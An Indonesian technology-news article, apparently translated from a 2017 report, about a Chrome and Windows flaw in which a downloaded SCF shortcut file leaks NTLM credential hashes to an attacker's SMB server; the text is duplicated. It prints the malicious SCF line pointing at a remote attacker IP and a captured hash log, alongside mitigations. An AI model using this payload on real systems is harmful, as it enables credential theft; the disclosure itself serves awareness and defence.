Awas! Hacker Bisa Mencuri Password Windows Anda Secara Remote Menggunakan Chrome - Kingdom Taurus News - Technology News
Google-chrome-windows-password-hacking-scf-smb

Google-chrome-windows-password-hacking-scf-smb
Google-chrome-windows-password-hacking-scf-smb
src,the hackernews

Seorang peneliti keamanan telah menemukan kerentanan serius dalam konfigurasi default versi terbaru Google Chrome yang berjalan pada versi sistem operasi Microsoft Windows, termasuk Windows 10, yang memungkinkan peretas jarak jauh mencuri kredensial masuk pengguna.


Peneliti Bosko Stankovic dari defense code telah  menemukan  bahwa hanya dengan mengunjungi situs web yang berisi file SCF yang berbahaya, memungkinkan korban untuk tidak sadar berbagi identitas masuk komputer mereka dengan peretas melalui Chrome dan protokol SMB.
Dikutip dari thehackernews,(17/5/2017)

Teknik ini tidak baru dan dimanfaatkan oleh Stuxnet sebuah malware hebat yang dirancang khusus untuk menghancurkan program nuklir Iran - yang menggunakan file NSK pintas Windows untuk sistem kompromi.

Apa yang membuat serangan ini berbeda dari yang lain adalah kenyataan bahwa serangan terkait otentikasi SMB semacam itu telah ditunjukkan pertama kali di Google Chrome secara publik, setelah Internet Explorer (IE) dan Edge.

Chrome + SCF + SMB = Mencuri Kredensial Windows


Format file shortcut SCF (Shell Command File) bekerja serupa dengan file LNK dan dirancang untuk mendukung serangkaian perintah Windows Explorer terbatas yang membantu menentukan ikon di desktop Anda, seperti My Computer and Recycle Bin.

"Saat ini, penyerang hanya perlu menarik perhatian korban (menggunakan Google Chrome dan Windows yang telah diperbarui sepenuhnya) untuk mengunjungi situs webnya agar dapat melanjutkan dan menggunakan kembali kredensial otentikasi korban," tulis Stankovic dalam sebuah posting blog, yang menjelaskan kekurangannya.
Pada dasarnya, shortcut link pada desktop Anda adalah file teks dengan sintaks khusus dari kode shell yang mendefinisikan lokasi ikon / thumbnail, nama aplikasi dan lokasinya.
[Shell]
Command = 2
IconFile = explorer.exe, 3
Karena Chrome mempercayai file Windows SCF, penyerang dapat menipu korban untuk mengunjungi situs web mereka yang berisi file shortcut yang dibuat dengan sengaja, yang akan didownload secara otomatis ke sistem target tanpa meminta konfirmasi dari pengguna.
Begitu pengguna membuka folder yang berisi file yang diunduh tersebut, segera atau lambat, file ini secara otomatis berjalan untuk mengambil ikon tanpa pengguna harus mengkliknya.

Tapi alih-alih menyetel lokasi gambar ikon, file SCF berbahaya yang dibuat oleh penyerang berisi lokasi server SMB jarak jauh (dikendalikan oleh penyerang).


Ikon [Shell] IconFile = \\ 170.170.170.170 \
Jadi, segera setelah file SCF mencoba untuk mengambil gambar ikon, ia akan mengelabui pembuatan autentikasi otomatis dengan server jarak jauh yang dikontrol penyerang melalui protokol SMB, menyerahkan nama pengguna dan versi hash password, yang memungkinkan penyerang untuk menggunakan Mandat untuk melakukan otentikasi ke komputer pribadi atau sumber jaringan Anda.

"Menetapkan lokasi ikon ke server SMB jarak jauh adalah vektor serangan yang diketahui yang menyalahgunakan fitur otentikasi otomatis Windows saat mengakses layanan seperti file file jarak jauh," kata Stankovic.

Tapi setelah serangan Stuxnet, Microsoft memaksa file LNK memuat ikon mereka hanya dari sumber daya lokal sehingga mereka tidak lagi rentan terhadap serangan semacam itu yang membuat mereka memuat kode berbahaya dari server luar.

Namun,

Mengeksploitasi LM / NTLM Hash Authentication via SCF File

Mengeksploitasi LM / NTLM Hash Authentication
Sumber Gambar: SANS
Tapi mengapa PC Windows Anda secara otomatis menyerahkan kredensial Anda ke server?

Jika Anda tidak sadar, ini adalah bagaimana otentikasi melalui protokol Server Message Block (SMB) bekerja dalam kombinasi dengan mekanisme otentikasi challenge / response NTLM.

Singkatnya, otentikasi LM / NTLM bekerja dalam 4 langkah:

  • Pengguna Windows (klien) mencoba masuk ke server.
  • Server merespons dengan nilai tantangan, meminta pengguna untuk mengenkripsi nilai tantangan dengan kata sandi hashnya dan mengirimkannya kembali.
  • Windows menangani permintaan SCF dengan mengirimkan nama pengguna dan versi hash dari password ke server.
  • Server kemudian menangkap respons tersebut dan menyetujui otentikasi, jika password hash klien benar.
Sekarang, dalam skenario serangan SCF, yang dijabarkan oleh Stankovic, Windows akan mencoba untuk melakukan otentikasi ke server SMB berbahaya secara otomatis dengan memberikan nama pengguna korban dan hash kata kunci NTLMv2 (komputer pribadi atau sumber jaringan) ke server, seperti yang dijelaskan di atas. Langkah 3.

Jika pengguna adalah bagian dari jaringan perusahaan, kredensial jaringan yang diberikan kepada pengguna oleh sysadmin perusahaannya akan dikirim ke penyerang.

Jika korban adalah pengguna rumahan, username dan password Windows korban akan dikirim ke penyerang.

[*] SMB Ditangkap - 2017-05-15 13:10:44 +0200
Respon NTLMv2 Ditangkap dari 173.203.29.182:62521 - 173.203.29.182
PENGGUNA: Bosko DOMAIN: Master OS: LM:
LMHASH:
Dinonaktifkan LM_CLIENT_CHALLENGE:
Dinonaktifkan NTHASH: 98daf39c3a253bbe4a289e7a746d4b24
NT_CLIENT_CHALLENGE: 01010000000000000e5f83e06fcdd201ccf26d91cd9e326e000000000200000000000
00000000000
Bosko :: Master: 1122334455667788: 98daf39c3a253bbe4a289e7a746d4b24: 01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000
Tidak diragukan lagi, kredensial dienkripsi tapi bisa "dipaksa brutal" nantinya untuk mengambil kata sandi login asli dalam teks biasa.
"Perlu disebutkan bahwa file SCF akan muncul tanpa ekstensi di Windows Explorer terlepas dari pengaturan file dan folder," kata peneliti tersebut. "Karena itu, file bernama picture.jpg.scf akan muncul di Windows Explorer sebagai picture.jpg. Ini menambah sifat serangan yang tidak mencolok dengan menggunakan file SCF."


Tidak Perlu Decrypt Password 


Karena sejumlah layanan Microsoft menerima kata sandinya dalam bentuk hashednya, penyerang bahkan dapat menggunakan kata sandi terenkripsi untuk masuk ke OneDrive, Outlook.com, Office 365, Office Online, Skype, Xbox Live dan layanan Microsoft lainnya, membuat dekripsi. Tidak perlu

Kerentanan semacam itu, menurut peneliti, juga dapat menimbulkan ancaman serius bagi organisasi besar karena mereka memungkinkan penyerang untuk meniru salah satu anggotanya, yang memungkinkan penyerang untuk segera memanfaatkan kembali hak istimewa untuk meningkatkan akses dan mendapatkan akses dan kontrol sumber daya TI mereka dan melakukan Serangan terhadap anggota lainnya

Cara Mencegah Serangan yang Terkait dengan Otentikasi SMB semacam itu


Blok koneksi outbound SMB (port TCP 139 dan 445) dari jaringan lokal ke WAN melalui firewall, sehingga komputer lokal tidak dapat melakukan query server SMB jauh.

Stankovic juga menyarankan pengguna untuk mempertimbangkan untuk menonaktifkan unduhan otomatis di Google Chrome dengan membuka Setelan → Menunjukkan setelan lanjutan → dan kemudian Centang opsi "Tanya di mana untuk menyimpan setiap file sebelum mendownload" .

Perubahan ini akan memungkinkan Anda menyetujui setiap upaya unduhan secara manual, yang secara signifikan akan mengurangi risiko serangan pencurian kredensial menggunakan file SCF.





Google sadar akan kerentanan tersebut dan dikatakan bekerja di tambalan, namun tidak ada kerangka waktu yang diberikan kapan patch tersebut akan tersedia bagi pengguna.

Awas! Hacker Bisa Mencuri Password Windows Anda Secara Remote Menggunakan Chrome

Baca Juga

Google-chrome-windows-password-hacking-scf-smb

Google-chrome-windows-password-hacking-scf-smb
Google-chrome-windows-password-hacking-scf-smb
src,the hackernews

Seorang peneliti keamanan telah menemukan kerentanan serius dalam konfigurasi default versi terbaru Google Chrome yang berjalan pada versi sistem operasi Microsoft Windows, termasuk Windows 10, yang memungkinkan peretas jarak jauh mencuri kredensial masuk pengguna.


Peneliti Bosko Stankovic dari defense code telah  menemukan  bahwa hanya dengan mengunjungi situs web yang berisi file SCF yang berbahaya, memungkinkan korban untuk tidak sadar berbagi identitas masuk komputer mereka dengan peretas melalui Chrome dan protokol SMB.
Dikutip dari thehackernews,(17/5/2017)

Teknik ini tidak baru dan dimanfaatkan oleh Stuxnet sebuah malware hebat yang dirancang khusus untuk menghancurkan program nuklir Iran - yang menggunakan file NSK pintas Windows untuk sistem kompromi.

Apa yang membuat serangan ini berbeda dari yang lain adalah kenyataan bahwa serangan terkait otentikasi SMB semacam itu telah ditunjukkan pertama kali di Google Chrome secara publik, setelah Internet Explorer (IE) dan Edge.

Chrome + SCF + SMB = Mencuri Kredensial Windows


Format file shortcut SCF (Shell Command File) bekerja serupa dengan file LNK dan dirancang untuk mendukung serangkaian perintah Windows Explorer terbatas yang membantu menentukan ikon di desktop Anda, seperti My Computer and Recycle Bin.

"Saat ini, penyerang hanya perlu menarik perhatian korban (menggunakan Google Chrome dan Windows yang telah diperbarui sepenuhnya) untuk mengunjungi situs webnya agar dapat melanjutkan dan menggunakan kembali kredensial otentikasi korban," tulis Stankovic dalam sebuah posting blog, yang menjelaskan kekurangannya.
Pada dasarnya, shortcut link pada desktop Anda adalah file teks dengan sintaks khusus dari kode shell yang mendefinisikan lokasi ikon / thumbnail, nama aplikasi dan lokasinya.
[Shell]
Command = 2
IconFile = explorer.exe, 3
Karena Chrome mempercayai file Windows SCF, penyerang dapat menipu korban untuk mengunjungi situs web mereka yang berisi file shortcut yang dibuat dengan sengaja, yang akan didownload secara otomatis ke sistem target tanpa meminta konfirmasi dari pengguna.
Begitu pengguna membuka folder yang berisi file yang diunduh tersebut, segera atau lambat, file ini secara otomatis berjalan untuk mengambil ikon tanpa pengguna harus mengkliknya.

Tapi alih-alih menyetel lokasi gambar ikon, file SCF berbahaya yang dibuat oleh penyerang berisi lokasi server SMB jarak jauh (dikendalikan oleh penyerang).


Ikon [Shell] IconFile = \\ 170.170.170.170 \
Jadi, segera setelah file SCF mencoba untuk mengambil gambar ikon, ia akan mengelabui pembuatan autentikasi otomatis dengan server jarak jauh yang dikontrol penyerang melalui protokol SMB, menyerahkan nama pengguna dan versi hash password, yang memungkinkan penyerang untuk menggunakan Mandat untuk melakukan otentikasi ke komputer pribadi atau sumber jaringan Anda.

"Menetapkan lokasi ikon ke server SMB jarak jauh adalah vektor serangan yang diketahui yang menyalahgunakan fitur otentikasi otomatis Windows saat mengakses layanan seperti file file jarak jauh," kata Stankovic.

Tapi setelah serangan Stuxnet, Microsoft memaksa file LNK memuat ikon mereka hanya dari sumber daya lokal sehingga mereka tidak lagi rentan terhadap serangan semacam itu yang membuat mereka memuat kode berbahaya dari server luar.

Namun,

Mengeksploitasi LM / NTLM Hash Authentication via SCF File

Mengeksploitasi LM / NTLM Hash Authentication
Sumber Gambar: SANS
Tapi mengapa PC Windows Anda secara otomatis menyerahkan kredensial Anda ke server?

Jika Anda tidak sadar, ini adalah bagaimana otentikasi melalui protokol Server Message Block (SMB) bekerja dalam kombinasi dengan mekanisme otentikasi challenge / response NTLM.

Singkatnya, otentikasi LM / NTLM bekerja dalam 4 langkah:

  • Pengguna Windows (klien) mencoba masuk ke server.
  • Server merespons dengan nilai tantangan, meminta pengguna untuk mengenkripsi nilai tantangan dengan kata sandi hashnya dan mengirimkannya kembali.
  • Windows menangani permintaan SCF dengan mengirimkan nama pengguna dan versi hash dari password ke server.
  • Server kemudian menangkap respons tersebut dan menyetujui otentikasi, jika password hash klien benar.
Sekarang, dalam skenario serangan SCF, yang dijabarkan oleh Stankovic, Windows akan mencoba untuk melakukan otentikasi ke server SMB berbahaya secara otomatis dengan memberikan nama pengguna korban dan hash kata kunci NTLMv2 (komputer pribadi atau sumber jaringan) ke server, seperti yang dijelaskan di atas. Langkah 3.

Jika pengguna adalah bagian dari jaringan perusahaan, kredensial jaringan yang diberikan kepada pengguna oleh sysadmin perusahaannya akan dikirim ke penyerang.

Jika korban adalah pengguna rumahan, username dan password Windows korban akan dikirim ke penyerang.

[*] SMB Ditangkap - 2017-05-15 13:10:44 +0200
Respon NTLMv2 Ditangkap dari 173.203.29.182:62521 - 173.203.29.182
PENGGUNA: Bosko DOMAIN: Master OS: LM:
LMHASH:
Dinonaktifkan LM_CLIENT_CHALLENGE:
Dinonaktifkan NTHASH: 98daf39c3a253bbe4a289e7a746d4b24
NT_CLIENT_CHALLENGE: 01010000000000000e5f83e06fcdd201ccf26d91cd9e326e000000000200000000000
00000000000
Bosko :: Master: 1122334455667788: 98daf39c3a253bbe4a289e7a746d4b24: 01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000
Tidak diragukan lagi, kredensial dienkripsi tapi bisa "dipaksa brutal" nantinya untuk mengambil kata sandi login asli dalam teks biasa.
"Perlu disebutkan bahwa file SCF akan muncul tanpa ekstensi di Windows Explorer terlepas dari pengaturan file dan folder," kata peneliti tersebut. "Karena itu, file bernama picture.jpg.scf akan muncul di Windows Explorer sebagai picture.jpg. Ini menambah sifat serangan yang tidak mencolok dengan menggunakan file SCF."


Tidak Perlu Decrypt Password 


Karena sejumlah layanan Microsoft menerima kata sandinya dalam bentuk hashednya, penyerang bahkan dapat menggunakan kata sandi terenkripsi untuk masuk ke OneDrive, Outlook.com, Office 365, Office Online, Skype, Xbox Live dan layanan Microsoft lainnya, membuat dekripsi. Tidak perlu

Kerentanan semacam itu, menurut peneliti, juga dapat menimbulkan ancaman serius bagi organisasi besar karena mereka memungkinkan penyerang untuk meniru salah satu anggotanya, yang memungkinkan penyerang untuk segera memanfaatkan kembali hak istimewa untuk meningkatkan akses dan mendapatkan akses dan kontrol sumber daya TI mereka dan melakukan Serangan terhadap anggota lainnya

Cara Mencegah Serangan yang Terkait dengan Otentikasi SMB semacam itu


Blok koneksi outbound SMB (port TCP 139 dan 445) dari jaringan lokal ke WAN melalui firewall, sehingga komputer lokal tidak dapat melakukan query server SMB jauh.

Stankovic juga menyarankan pengguna untuk mempertimbangkan untuk menonaktifkan unduhan otomatis di Google Chrome dengan membuka Setelan → Menunjukkan setelan lanjutan → dan kemudian Centang opsi "Tanya di mana untuk menyimpan setiap file sebelum mendownload" .

Perubahan ini akan memungkinkan Anda menyetujui setiap upaya unduhan secara manual, yang secara signifikan akan mengurangi risiko serangan pencurian kredensial menggunakan file SCF.





Google sadar akan kerentanan tersebut dan dikatakan bekerja di tambalan, namun tidak ada kerangka waktu yang diberikan kapan patch tersebut akan tersedia bagi pengguna.

Related Posts :

About me: Penulis teknologi dan menyukai game mobile.

Membahas Tentang: Berita Teknologi, Smartphone, Game, dan Harga Smartphone.
Contact us:
ktn.info1@gmail.com

No comments

How do you think, about the article above?